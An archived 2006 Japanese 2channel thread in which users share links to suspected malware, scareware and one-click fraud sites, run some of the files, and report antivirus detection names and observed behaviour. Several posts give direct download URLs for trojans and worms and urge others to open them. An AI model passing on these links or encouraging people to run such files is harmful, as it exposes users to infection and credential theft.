5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

あやしいファイルを実行するスレ

1 :名無しさん@お腹いっぱい。:2006/02/21(火) 19:17:59
どうぞ
ttp://www.uploda.org/uporg306729.zip
ttp://popra.zone.ne.jp/movie/wmv.exe

2 :名無しさん@お腹いっぱい。:2006/02/21(火) 19:22:12
>>1
上は消えてる
下は実行してみたらいきなりネットにつなごうとした
拒否したら「サーバーから情報を得られませんでした」だと

3 :名無しさん@お腹いっぱい。:2006/02/21(火) 19:25:14
>>1
下はワンクリック詐欺のサイトだ。
ホスティングしている会社からの警告か何かで一旦消されたはずなんだがなぁ。
またアップロードしやがったのか?
しつこい業者だな・・・。

4 :名無しさん@お腹いっぱい。:2006/02/21(火) 20:00:44
ワンクリック系は技術的にはまだ稚拙だから駆除しようとすればすぐにできるな。
しかし、ステルス系の高度なものが出現すると厄介だな。

5 :名無しさん@お腹いっぱい。:2006/02/21(火) 20:10:47
>>1
下はカスペでTrojan-PSW.Win32.Kapod.nとして検出されます。

6 :名無しさん@お腹いっぱい。:2006/02/21(火) 21:23:05
JUST the GTL (エロサイト、ココ自体は安全)で紹介されてるエロ画像直リンでウィルス感染したw
http://www.genie.x0.com/gtl/new.html

2/17分のどれかだったと思う。 今まで世話になったがモウイカネw


7 :名無しさん@お腹いっぱい。:2006/02/22(水) 02:06:40
先日、WEB専門 広告代理店『 Lapis-Lazuli 』というところから、
バナー広告掲載依頼のメールが来て、
下記のアドレスを参照し、画像をクリックしたところ、ほんの1秒ほどDOSっぽい怪しげな画面が立ち上がったので、不安な状態です。

--------------------------------------------------
サイト名  妹くらぶ
URL   http://www.236488.com/
概要    アニメコンテンツと実写コンテンツを
      ご用意して運営しております。
      形と致しましては2クリックでのご入会で、
      最終的な確認画面も御座います。
      一日当たりの料金は134円となっております。
--------------------------------------------------

感染してしまったのでしょうか・・? 誰か分かる方ヘルプ


8 :名無しさん@お腹いっぱい。:2006/02/22(水) 02:16:51
ここはあやしいファイルを実行してウイルスに感染するスレだよ

9 :名無しさん@お腹いっぱい。:2006/02/22(水) 02:20:17
どのスレに書き込んでいいのか分からなかったので、 6 の書き込みに近いから良いのかと思ったんだけど。


10 :名無しさん@お腹いっぱい。:2006/02/22(水) 11:51:51
>>9
典型的なワンクリック詐欺サイト。
これ以上は無いくらいに典型的。
何も相手することは無い。
相手をしてメールを送ったり、電話をかけると大変なことになる。

11 :9:2006/02/23(木) 10:05:58
>>10
ありがとうございます。教えてくれて大変助かりました。

症状が何も出なかったので、スパイウェアが仕掛けられたり、ある日突然プツンとハードディスクがやられたりしているのかと、心配になっていました。

12 :9:2006/02/23(木) 11:30:41
もちろん、性的な意味で。

13 :名無しさん@お腹いっぱい。:2006/06/03(土) 02:13:49
発 行   マカフィー株式会社
〒150-0043
渋谷区道玄坂1-12-1 渋谷マークシティウエスト20F
TEL.03-5428-1100(代)

Copyright(c)2004,2005 McAfee,Inc.AllRightsReserved.

14 :名無しさん@お腹いっぱい。:2006/06/04(日) 19:02:36
( ̄_J ̄)ん?…マカフィーがどうかしたか?

15 :名無しさん@お腹いっぱい。:2006/06/04(日) 22:53:29
ネタ持ってきたので踏んじゃってください。 http://mysky.6600.org/yx/gz.exe

16 :名無しさん@お腹いっぱい。:2006/06/07(水) 15:38:45
>>15
実行しようとダウソしたらバスター反応
BKDR_HUPIGON.FN 詳細情報無し

それともこのスレはアンチウイルス切ってでも実行するという趣旨なのか

17 :名無しさん@お腹いっぱい。:2006/06/07(水) 16:05:19
>>15
マカフィー無反応(´・ω・)ワロイソス

18 :名無しさん@お腹いっぱい。:2006/06/07(水) 16:06:28
>>16
8 名無しさん@お腹いっぱい。 sage 2006/02/22(水) 02:16:51
ここはあやしいファイルを実行してウイルスに感染するスレだよ

19 :名無しさん@お腹いっぱい。:2006/06/07(水) 20:20:42
>>15を実行した
Windowsフォルダ内に
IEXPL0RE.EXE と IEXPL0RE.PIF を作成
IEXPL0RE.EXE は gz.exeと同内容
後はよくわからんのでregmonのログでも貼っておく
ttp://www.uploda.org/uporg411027.txt

20 :名無しさん@お腹いっぱい。:2006/07/11(火) 08:30:31
http://www.geocities.jp/kumada_eri/index.html

21 :名無しさん@お腹いっぱい。:2006/07/11(火) 15:04:29
( ^−^)

22 :名無しさん@お腹いっぱい。:2006/08/27(日) 23:25:45
怪しいファイルを実行しようとしてもソフトウェア制限ポリシーによってこのプログラムは
実行できないようになっています。

って出てくるだけなんです。どうやったら感染してくれますか?

23 :名無しさん@お腹いっぱい。:2006/08/28(月) 13:43:47
ttp://support.microsoft.com/default.aspx?scid=kb%3Bja%3B310791

24 :名無しさん@お腹いっぱい。:2006/08/31(木) 13:02:27
http://giwaku.com/1c.shtml

これってウイルスですか?
感染したような気が。。。
解決法あったらよそしくお願いします。

25 :名無しさん@お腹いっぱい。:2006/08/31(木) 14:28:51
>>24
この板では鑑定はしないよ。
鑑定スレのある板で。
勇気がなくて見られない画像鑑定スレ Part814(ラウンジ板)
http://etc3.2ch.net/test/read.cgi/entrance/1156992526/

26 :名無しさん@お腹いっぱい。:2006/08/31(木) 14:31:35
>>24
マルチ視ね

27 :ニューウェイズ:2006/08/31(木) 19:25:08
>>26
呼んだ?

28 :名無しさん@お腹いっぱい。:2006/08/31(木) 22:21:58
http://www.dotup.org/uploda/www.dotup.org7890.zip.html
踏んでも大丈夫か検証お願い

29 :名無しさん@お腹いっぱい。:2006/08/31(木) 22:30:44
>>28
503

30 :28:2006/08/31(木) 22:38:46
普通に見れるけど、   実行たのむ

31 :28:2006/08/31(木) 22:40:54
ほんとだ、さっきのは偶然か アクセスできるようになったら検証頼みます

32 :名無しさん@お腹いっぱい。:2006/09/01(金) 00:08:40
ダメだろこれ。avast!にbitdefenderも反応するし

33 :名無しさん@お腹いっぱい。:2006/09/01(金) 00:20:09
>>28
バスターで「TROJ_PVSTEALTH.B」

それともこのスレはアンチウイルス切ってでも実行するという趣旨なのか

34 :28:2006/09/01(金) 01:44:50
ありがとうございます、 ソースネクストのソフトでは無反応だったもので、


35 :名無しさん@お腹いっぱい。:2006/09/01(金) 01:52:26
このスレはソースネクストのソフトを入れて実行するという趣旨だったらしい

36 :名無しさん@お腹いっぱい。:2006/09/01(金) 01:53:38
>>28
ぜひいろんなファイルを実行して、糞ースの凄さを見せつけてくれ!

37 :名無しさん@お腹いっぱい。:2006/09/01(金) 02:14:41
拾ってきたよ
http://vipperup.orz.hm/uploader/src/viup10527.zip.html
パス:vip

38 :名無しさん@お腹いっぱい。:2006/09/01(金) 03:47:49
>>37
強制再起動食らった

39 :名無しさん@お腹いっぱい。:2006/09/12(火) 09:38:48
新種ウイルスの可能性あります。

initial d のほぼ全話が見れるサイト
ウイルスファイルの可能性もあるが、
とりあえず映像は見られる。

http://carfreaks.b0nk.net/InitialD/

どのファイルかは分からないけど
実行すると 不正ななんとか がどうのこうのと出て
なぜかGYAOが見られなくなります。

40 :名無しさん@お腹いっぱい。:2006/09/12(火) 09:58:21
全部aviの様ですが

41 :名無しさん@お腹いっぱい。:2006/09/12(火) 10:00:56
aviの再生環境くらい整えてから物を言え

42 :名無しさん@お腹いっぱい。:2006/09/13(水) 18:29:17
http://www.vipper.net/vip90889.jpg

これで感染して困っています、対処教えて下さい。
ちょうどアンチウィルス期限切れた翌日だったので。。
体験版カスペルスキーが弾かれます・・・。

43 :名無しさん@お腹いっぱい。:2006/09/13(水) 18:30:12
404えらー

44 :名無しさん@お腹いっぱい。:2006/09/20(水) 04:12:24
http://www.freepgs.com/asia_colgate/pcast_1.1.exe

お願いします。
以前ウィルスバスターをかわして、PEST PATROLを導入後見つかった物です。


45 :名無しさん@お腹いっぱい。:2006/09/20(水) 07:05:41
>>44
「PodcastbarMini」というp2pを用いたTV視聴アプリケーションらしい
BitDefenderはインストーラの段階でトロイ扱いした
出所は中華圏らしく、インストール中は文字化けしていた
起動はさせてみたものの、やっぱりポート開放が必要なのか動かなかった

とりあえずそこまではAVKとSpySweeperは何も言わなかったが
アンインストールしてもフォルダ内に一部ファイルが残されたままとか
やや妙な点もあるので、eTrustの言うようにアドウェアなのかもしれない

触れぬが吉、かな

46 :名無しさん@お腹いっぱい。:2006/09/20(水) 08:08:59
イートラじゃなくてペストパだな
http://vista.undo.jp/img/vi5870718561.jpg
何かよう分からんけど

47 :名無しさん@お腹いっぱい。:2006/09/21(木) 22:29:02
>>45
>>46
ありがとうございました。

あの後、ウイルスバスター2006から2007をに変えてもう一度なんとか消してみようとしたんですが、
失敗しまして再インストールしてきました。






48 :名無しさん@お腹いっぱい。:2006/09/21(木) 22:57:28
ぁゃιぃスレですね

49 :名無しさん@お腹いっぱい。:2006/09/21(木) 23:07:13
もっとドキドキワクワクさせてくれるようなURL貼れよ

50 :ヽ(´ー`)ノ:2006/09/21(木) 23:09:41
ぁゃιぃ系ロダのファイル開いてウィンドウがいっぱいになったのも
いい思い出だ

51 :名無しさん@お腹いっぱい:2006/09/26(火) 22:41:33
http://umbrellaexe.fc2web.com/ugtool.html
上のURLのSミサイルの謎を解明する奴求む。
PC壊れたらすまそ。Sミサイルの情報を探しているのです(´・ω・`)

52 :名無しさん@お腹いっぱい。:2006/09/26(火) 23:04:50
404エラーだったよ

53 :名無しさん@お腹いっぱい:2006/09/26(火) 23:35:27
>>52
え?あ、ほんとだw
すまん・・・(´・ω・`)
お詫びにウイルスのURL貼り付けます…

ttp://keepsurfing.net/tool/virus/klez.zip
ttp://www2.strangeworld.org/virus/blasterworm.zip
ttp://popup8.tok2.com/home2/phocke/fla/one_z.swf
ttp://www.google.co.jp/search?hl=ja&ie=UTF-8&oe=UTF-8&q=%22index+of%22+%22msblast.zip%22&lr=
ttp://renzyu.hp.infoseek.co.jp/denki.zip
ttp://www2.strangeworld.org/virus/blasterworm.zip
ttp://www.geocities.jp/virii3/mydoom/readme.zip
ttp://usuarios.lycos.es/unsafebytesftp2/troyanos/deepthroat3.zip
ttp://f31.aaacafe.ne.jp/~hira/Important.xls
ttp://webite.at.infoseek.co.jp/flash/wotakey_sugar.swf

ウイルスマニアだったりしますw
ちなみにウイルスかかるの嫌だから開かない派っす…
まだまだありますけど…

てか上の結構前のだからなくなってると思われる

54 :名無しさん@お腹いっぱい。:2006/09/26(火) 23:42:49
なんだ、ウイルスはこれだけじゃないか
ttp://f31.aaacafe.ne.jp/~hira/Important.xls

55 :名無しさん@お腹いっぱい。:2006/09/26(火) 23:48:06
ほとんどリンク切れだなぁw
最後のフラッシュが>>53の真の狙いか?w

56 :名無しさん@お腹いっぱい。:2006/09/27(水) 00:04:37
そもそもファイル名からしてクレズやブラスターとかゴミウイルスばかりだな
これで自称マニアとか惨めすぎる

57 :名無しさん@お腹いっぱい。:2006/09/27(水) 22:48:28
マニアは何匹か自分の家で飼ってるモンだ

58 :名無しさん@お腹いっぱい。:2006/09/28(木) 04:29:44
チェルノブイリが欲しいんだが
誰かない?

59 :インスコマンコ3 ◆tG.DZH.Ero :2006/12/06(水) 13:03:01
さてと

60 :名無しさん@お腹いっぱい。:2006/12/06(水) 13:26:35
遠路はるばる過疎スレへようこそ

61 :名無しさん@お腹いっぱい。:2006/12/06(水) 13:59:28
http://jp.drivecleaner.com/.freeware/
どうよこれ

62 :名無しさん@お腹いっぱい。:2006/12/06(水) 20:55:53
クレズも一時は大暴れしたが、いまは対策ソフトで容易にとまるもんな

63 :名無しさん@お腹いっぱい。:2006/12/06(水) 21:01:15
クレズ流行ってまだたいして経ってないよね?
なんかすごい勢いでウイルスも進化してるような、、、
破壊型から利益が得られるような(金とか)ウイルスが最近大杉。
五年後とかどうなってんだろ・・・・

64 :名無しさん@お腹いっぱい。:2006/12/06(水) 21:19:56
ウイルスがなくなっているより先に、2chがなくなっている。

65 :名無しさん@お腹いっぱい。:2006/12/06(水) 23:55:05
コナ━━━━(゚A゚)━━━━イ !!!!!  

66 :インスコマンコ3 ◆tG.DZH.Ero :2006/12/07(木) 00:20:56
マダァ-? (・∀・ )っ/凵⌒☆チンチン

67 :名無しさん@お腹いっぱい。:2006/12/07(木) 19:33:15
つwww.game4enjoy.net/av/061121-t.jpg.scr

68 :インスコマンコ3 ◆tG.DZH.Ero :2006/12/07(木) 20:04:27
Now reporting please wait...

69 :名無しさん@お腹いっぱい。:2006/12/07(木) 20:08:46
>>67
Trojan-PSW.Win32.Maran.bg

>>68
楽しみに待ってるぜ

70 :名無しさん@お腹いっぱい。:2006/12/07(木) 20:11:02
JPG偽装のEXEファイルです。(拡張子をSCRにしただけ)
http://www.dotup.org/uploda/www.dotup.org11706.png

実行しても特に何も起こらなかったので再起動しようとするとプログラムが終了できないというメッセージ
http://www.dotup.org/uploda/www.dotup.org11708.png
タスクマネージャでも終了不可能
http://www.dotup.org/uploda/www.dotup.org11710.png

しかたなく強制終了するとWindowsお決まりのメッセージ
http://www.dotup.org/uploda/www.dotup.org11711.png

IEのトップページ等は変わっていません
http://www.dotup.org/uploda/www.dotup.org11712.png

氏万テックオンラインスキャンの結果
http://www.dotup.org/uploda/www.dotup.org11716.png

71 :インスコマンコ3 ◆tG.DZH.Ero :2006/12/07(木) 20:11:38
>>70
また鳥付け忘れたスマンコ

72 :名無しさん@お腹いっぱい。:2006/12/07(木) 20:46:14
>>67
Generic PWS.b

73 :名無しさん@お腹いっぱい。:2006/12/07(木) 20:47:27
ドピュ

74 :名無しさん@お腹いっぱい。:2006/12/08(金) 18:09:07
ttp://www.nya-taloda.jpn.org/2MB/upload.cgi?mode=dl&file=1786
DLkey:antidote

これは大丈夫でしょうか?

75 :インスコマン ◆qlwUrCXXtM :2006/12/08(金) 18:17:47
>>74
問題ないけど?

76 :74:2006/12/08(金) 18:19:51
ありがとうございました

77 :インスコマンコ3 ◆tG.DZH.Ero :2006/12/09(土) 15:47:38
つくってみた
http://pcseclabs.web.fc2.com/

78 :名無しさん@お腹いっぱい。:2006/12/09(土) 15:52:37
system doctor 入れたwww

79 :名無しさん@お腹いっぱい。:2006/12/09(土) 16:54:54
うほっ

80 :名無しさん@お腹いっぱい。:2006/12/09(土) 17:28:02
インスコマンコ3 WILLTYは〜?

81 :a:2006/12/09(土) 17:31:42
http://proxy.f3.ymdb.yahoofs.jp/bc/450fd633_152da/bc/%a4%ba%a4%d0%a4%ea%b8%c0%a4%a6%a4%ef%a4%e8.sfx.exe?bcarneFBNb81hieF
http://proxy.f3.ymdb.yahoofs.jp/bc/450fd633_152da/bc/%a4%ba%a4%d0%a4%ea%b8%c0%a4%ef%a4%ca%a4%a4%a4%ef%a4%e8.sfx.exe?bcarneFBW0bifhc.

82 :名無しさん@お腹いっぱい。:2006/12/09(土) 17:43:26
>>81
ちょ。。。なにそれ??

83 :名無しさん@お腹いっぱい。:2006/12/09(土) 17:48:39
ブラクラ

84 :名無しさん@お腹いっぱい。:2006/12/09(土) 18:29:41
>>81
変なの落ちてきたんだけど......

85 :名無しさん@お腹いっぱい。:2006/12/09(土) 18:33:10
アーカイブボムか。スマソ。

86 :名無しさん@お腹いっぱい。:2006/12/09(土) 18:53:02
http://www.seospy.net/src/up0365.zip

インスコマンコ頼んだ!

87 :インスコマンコ3 ◆tG.DZH.Ero :2006/12/09(土) 19:58:02
AntiVir、BitDefenderで反応なし。レビューでも書くか

88 :名無しさん@お腹いっぱい。:2006/12/09(土) 20:21:25
これ参考にして
eSafe、Fortinet、F-Prot4、Panda、では検出される
http://www.virustotal.com/vt/en/resultadof?43b11ed394605abbf0521148e0336ee6


89 :インスコマンコ3 ◆tG.DZH.Ero :2006/12/09(土) 20:27:45
とりあえずAntiVirに送っといた
Dear user,
Digital data should always be safe - free of viruses and of harmful code. 
Because of this reason, we are happy you are using our Internet offer to 
have suspicious files examined for a possible infection.
We have forwarded the file/s you have uploaded to our specialists from the virus lab. 
The file/s is/are being analyzed.
We will shortly communicate you the result via email - please have some patience.
We are at your disposal for all kinds of questions regarding virus protection. Please call us 
at +49 (0) 7542-500 0 or drop us an email to sales@avira.com
Please find current information about Avira and our security solutions on our website: www.avira.com
--
Yours sincerely
Avira GmbH

90 :名無しさん@お腹いっぱい。:2006/12/09(土) 20:55:28
レポートまだ〜?

91 :                 :2006/12/09(土) 20:57:15
http://proxy.f3.ymdb.yahoofs.jp/bc/450fd633_152da/bc/%a4%c5%a4%e9%a4%c5%a4%e9%a4%c5%a4%e9.sfx.exe?bcOoqeFB1T.uhkqm

92 :インスコマンコ3 ◆tG.DZH.Ero :2006/12/09(土) 21:18:01
>>86
なぜかランタイムエラーと出て実行できなかった


93 :名無しさん@お腹いっぱい。:2006/12/09(土) 22:12:06
http://www.freedownloadscenter.com/Authors/WinSoftware.html
ここにあるもの全部お願いしますorz

94 :名無しさん@お腹いっぱい。:2006/12/09(土) 22:15:10
うわ。。。。。押し売りソフトのオンパレードだ・・・

95 :名無しさん@お腹いっぱい。:2006/12/10(日) 10:11:16
インスコマンコさん
662 名前:655[sage] 投稿日:2006/12/09(土) 21:40:14 0
これがウイルス本体:悪用厳禁 DLkey=dokuro
http://2chshare.net/mini/files/2chshare-mini_0081.zip.html
ぱっと見た感じjpgファイルだけど実はexe
実行した後少しの時間潜伏して再起動→ドクロ
その後>>655のファイルなどを展開 >>655は消しました。

これを頼みます。
頼れるのはインスコマンコさんだけです。

96 :名無しさん@お腹いっぱい。:2006/12/10(日) 10:37:29
>>93
これはww
>WinContentFilter 2005 珍しいから入れてみる

97 :名無しさん@お腹いっぱい。:2006/12/10(日) 10:49:53
http://pc7.2ch.net/test/read.cgi/pcqa/1150380799/19


98 :名無しさん@お腹いっぱい。:2006/12/10(日) 11:03:08
>>97
くだらないことやってんな、ばーか

99 :WinContentFilter 2005:2006/12/10(日) 12:45:35
Welcome to WinSoftware!!
ttp://files.or.tp/up2567.png

100 :インスコマンコ3 ◆tG.DZH.Ero :2006/12/10(日) 13:10:08
>>93,95,96
やってみます

101 :名無しさん@お腹いっぱい。:2006/12/10(日) 17:20:17
>>100
インスコマン3生きてるか・・・・・・?

102 :名無しさん@お腹いっぱい。:2006/12/10(日) 17:27:09
インスマンコは今はサイトの方を頑張っているのさ多分

103 :名無しさん@お腹いっぱい。:2006/12/10(日) 17:34:30
なんかサイトは更新されてるようだから生きてるよ

104 :名無しさん@お腹いっぱい。:2006/12/10(日) 18:07:14
おっSystemDoctor2006が増えた /~

105 :名無しさん@お腹いっぱい。:2006/12/10(日) 18:19:19
本スレにいないと思ったらこんな事をやっていたのかw

106 :名無しさん@お腹いっぱい。:2006/12/10(日) 18:26:41
WinSoftwareの恨みを買わないように気をつけろよw

107 :元祖インスコマンコ:2006/12/11(月) 14:05:03
WinContentFilter 2005のSS
http://files.or.tp/up2586.zip

108 :インスコマンコ ◆tsGpSwX8mo :2006/12/11(月) 16:58:19
えへへへ


109 :名無しさん@お腹いっぱい。:2006/12/11(月) 19:33:23
だいぶインスコマンコ3のサイトが変わっていてワロタ
http://pcseclabs.web.fc2.com/


110 :名無しさん@お腹いっぱい。:2006/12/11(月) 19:38:02
>>109
GIGAZINEだらけだなw

111 :名無しさん@お腹いっぱい。:2006/12/11(月) 19:46:53
掲示板が2ちゃんっぽいwwwww

112 :名無しさん@お腹いっぱい。:2006/12/11(月) 20:46:04
    

113 :名無しさん@お腹いっぱい。:2006/12/11(月) 21:17:48
おいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおい

114 :名無しさん@お腹いっぱい。:2006/12/11(月) 23:05:16
初代を最近見かけないな。

115 :名無しさん@お腹いっぱい。:2006/12/11(月) 23:25:49
http://www2.uploader.jp/dl/reika/reika_uljp00071.zip.html

お願いします。アドウェアだとおもうのですが・・・

116 :名無しさん@お腹いっぱい。:2006/12/11(月) 23:33:57
>>115
http://www.virustotal.com/vt/en/resultadof?d2ea1e25369a3454a980a2148565e456

117 :名無しさん@お腹いっぱい。:2006/12/12(火) 12:06:20
ウイルスセキュリティをインスコしたぞ!!これで踏んでみよう

118 :117:2006/12/12(火) 14:04:03
クリスマスプレゼントを踏んだがカスペで検出するもの5個検出せず
Antinny系はWorm.Win32.Antinny.ayを検出できなかった。(ちなみにMicrosoftとSophosも)
なんてクールでエキサイティングなセキュリティソフトなんだ!

119 :名無しさん@お腹いっぱい。:2006/12/12(火) 18:14:17
WinAntiVirusPro2006レビューキター
http://pcseclabs.web.fc2.com/winantiviruspro2006.html

120 :名無しさん@お腹いっぱい。:2006/12/12(火) 18:23:33
(゚Д゚)ハァ?

121 :名無しさん@お腹いっぱい。:2006/12/12(火) 19:20:24
これは癖になるな

122 :名無しさん@お腹いっぱい。:2006/12/12(火) 19:32:41
実はWinAntiVirusProの検出力は真面目。


123 :名無しさん@お腹いっぱい。:2006/12/12(火) 23:46:01
ttp://ranobe.com/up/src/up157349.zip

exeアプリケーションの鑑定を御願いします

passはsageです

124 :インスコマンコ3 ◆tG.DZH.Ero :2006/12/13(水) 02:31:49
>>123
PangYaCalc.exeはLHA圧縮で内部にPangYaCalc.msiとsetup.exeが入ってる。
setup.exeは署名は入っていないが著作権はMicrosoft Corporationが持っている模様。
http://www.uploda.org/uporg614436.png.html
http://www.uploda.org/uporg614440.png.html

眠い・・・

125 :名無しさん@お腹いっぱい。:2006/12/13(水) 04:37:18
>>124
鑑定ありがとうございます

126 :名無しさん@お腹いっぱい。:2006/12/13(水) 15:52:00
良スレage

127 :インスコマンコ3 ◆tG.DZH.Ero :2006/12/15(金) 01:07:01
age

128 :名無しさん@お腹いっぱい。:2006/12/15(金) 06:52:59
http://skyst.net/e/src/sky0534.bin.html
Pass:vip

お願いします

129 :名無しさん@お腹いっぱい。:2006/12/15(金) 07:16:12
>>128
エロ動画

130 :名無しさん@お腹いっぱい。:2006/12/15(金) 07:31:07
>>129
ありがとうございます

131 :名無しさん@お腹いっぱい。:2006/12/15(金) 09:05:41
>>129
いい思いしたな

132 :名無しさん@お腹いっぱい。:2006/12/16(土) 22:58:48
あげ

133 :名無しさん@お腹いっぱい。:2006/12/17(日) 14:11:40
http://www.zerovirus.jp/

ゼロウイルス!ゼロウイルス!

134 :名無しさん@お腹いっぱい。:2006/12/17(日) 14:41:34
>>133
すっげー!!!!!!!!!!!!!!!!!!

完璧なスパイウェアー検索ツール
- ファイルの位置, 容量の比較による正確な検索
- レジストリの位置, キー, 値による正確な検索
- インターネットアクセスファイル(.URL)の内容分析による正確な検索
- 重複のないライン単位の個体数20000種以上保有

優秀なスパイウェアー検索エンジン及びウイルス検索エンジン
- 世界最大のスパイウェアーデーターベース保有
- 世界初ひとつのソフトでウイルス、スパイウェア同時検索・除去

パターンアップデートの容易性
- 24時間365日新しく発見されているスパイウェアー&ウイルスの素早いアップデート
- 24時間体制で緊急ウイルス発生に備えています。
- システムに影響を与えずにレジストリ、クッキー内を除去
- パターンアップデートをパソコン起動の際に自動チェック新種のウイルスもスパイウェアーもみのがしません
- お客様のご都合のいいようにアップデート提供

135 :名無しさん@お腹いっぱい。:2006/12/17(日) 14:42:16
観光しにきました

136 :名無しさん@お腹いっぱい。:2006/12/17(日) 14:42:31
絵葉書はどこに売ってますか?

137 :名無しさん@お腹いっぱい。:2006/12/17(日) 14:42:33
観光に来ました

138 :名無しさん@お腹いっぱい。:2006/12/17(日) 14:42:39
kannkou

139 :名無しさん@お腹いっぱい。:2006/12/17(日) 14:42:48
らウンコから観光にきますた

140 :名無しさん@お腹いっぱい。:2006/12/17(日) 14:42:55
ぁやしぃ観光きますた

141 :名無しさん@お腹いっぱい。:2006/12/17(日) 14:43:15
ラウンコから観光にきました

142 :名無しさん@お腹いっぱい。:2006/12/17(日) 14:43:26
観光にきました

143 :名無しさん@お腹いっぱい。:2006/12/17(日) 14:43:36
観光しに来ました

144 :名無しさん@お腹いっぱい。:2006/12/17(日) 14:43:44
音ゲー板から来ました

145 :名無しさん@お腹いっぱい。:2006/12/17(日) 14:43:48
ゼロウイルス!販売元 株式会社ゼスタス
http://www.google.co.jp/search?q=%E6%A0%AA%E5%BC%8F%E4%BC%9A%E7%A4%BE%E3%82%BC%E3%82%B9%E3%82%BF%E3%82%B9&lr=lang_ja&ie=utf-8&oe=utf-8&rls=org.mozilla:ja:official&client=firefox

146 :名無しさん@お腹いっぱい。:2006/12/17(日) 14:44:14
観光しにきました

147 :名無しさん@お腹いっぱい。:2006/12/17(日) 14:44:26
観光死にきました

148 :名無しさん@お腹いっぱい。:2006/12/17(日) 14:44:48
観光にきました

149 :名無しさん@お腹いっぱい。:2006/12/17(日) 14:45:41
つまんねえ観光地だな

150 :名無しさん@お腹いっぱい。:2006/12/17(日) 14:47:11
>>133
インストールしても、アップデートしか行われないわけだが

151 :名無しさん@お腹いっぱい。:2006/12/17(日) 14:49:13


152 :150:2006/12/17(日) 15:08:29
ゼロウイルスセットアップ
http://sukima.vip2ch.com/up/sukima00701.png
http://sukima.vip2ch.com/up/sukima00702.png
reedme
http://sukima.vip2ch.com/up/sukima00703.png

デスクトップのアイコンをクリックするもアップデートが繰り返されるのみ。
すぐに終了してしまう
http://sukima.vip2ch.com/up/sukima00704.png
ショートカットはアップデート専用か?
http://sukima.vip2ch.com/up/sukima00705.png
しかし他のファイルを実行するもすぐ終了してしまって何も起こらず

誰かインスコしてくれ

153 :名無しさん@お腹いっぱい。:2006/12/17(日) 15:09:55
>>133
BitDefenderでGeneric.Malware.w.7D653E9Cと
検出されるんだけど誤検出かな?

154 :133:2006/12/17(日) 15:13:56
VirusTotalでチェックしてみたらUNAでも
Trojan.Spy.Win32.Agent.CB94と検出された

155 :名無しさん@お腹いっぱい。:2006/12/17(日) 15:14:49
↑155の間違いねorz

156 :名無しさん@お腹いっぱい。:2006/12/17(日) 15:17:44
まずネーミングからしてウイルスセキュリティZEROのパクリだもんな、ウィンアンチウイルスとかと一緒で

157 :名無しさん@お腹いっぱい。:2006/12/17(日) 15:20:14
>>152
なぜ英語?

158 :名無しさん@お腹いっぱい。:2006/12/17(日) 15:20:45
韓国みたいだね

159 :インスコマンコ3 ◆tG.DZH.Ero :2006/12/17(日) 15:20:46
さてと

160 :名無しさん@お腹いっぱい。:2006/12/17(日) 15:22:26
>>158
キムなんたらって出てくるね・・・

161 :名無しさん@お腹いっぱい。:2006/12/17(日) 15:36:31
なにこれ・・アップデートしかできないの?

162 :名無しさん@お腹いっぱい。:2006/12/17(日) 15:38:25
VirusTotalにて
_zv.exe
http://www.virustotal.com/vt/en/resultadof?b44c0334be219a24bcc10bad0df840ba

163 :名無しさん@お腹いっぱい。:2006/12/17(日) 17:30:33
http://www.zerovirus.jp/image/right/img_07c.gif

164 :名無しさん@お腹いっぱい。:2006/12/17(日) 17:36:31
スーパー ウェアー

165 :名無しさん@お腹いっぱい。:2006/12/17(日) 17:37:02
スパー ウェアーwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
スパー ウェアーwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
スパー ウェアーwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
スパー ウェアーwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
スパー ウェアーwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
スパー ウェアーwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
スパー ウェアーwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
スパー ウェアーwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
スパー ウェアーwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
スパー ウェアーwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
スパー ウェアーwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
スパー ウェアーwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
スパー ウェアーwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
スパー ウェアーwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww


166 :名無しさん@お腹いっぱい。:2006/12/17(日) 17:38:23
      _______                     __ 
    // ̄~`i ゝ                    `l | 
    / /        ,______   ,_____    ________  | |  ____ TM 
   | |     ___ // ̄ヽヽ // ̄ヽヽ (( ̄))   | | // ̄_>> 
   \ヽ、   |l | |    | | | |    | |  ``( (.  .| | | | ~~ 
      `、二===-'  ` ===' '  ` ===' '  // ̄ヽヽ |__ゝ ヽ二='' 
                         ヽヽ___//   日本 


     ウェブ イメージ ニュース マップ グループ more >> 
           ̄ ̄ ̄  ̄ ̄ ̄ ̄  ̄ ̄   ̄ ̄ ̄ ̄  ̄ ̄ ̄ ̄ 
       ._________________ 
      |スパーウェアー .                  │・検索オプション 
      └────────────────┘・表示設定 
         | Google検索 | I'm Feeling Lucky |  ・言語ツール

167 :名無しさん@お腹いっぱい。:2006/12/17(日) 17:39:19
スパーウェアー の検索結果のうち 日本語のページ 約 1,150 件中 1 - 10 件目 (0.27 秒) 

168 :インスコマン ◆qlwUrCXXtM :2006/12/17(日) 18:39:24
readmeの内容
------

1.「ゼロウイルス」はフーリーソフトウェアーで、個人、企業、官公署等の全ての所より
ご使用できます。

2.「ゼロウイルス」プログラムの使用中発生した全ての問題において一切責任を負いません。

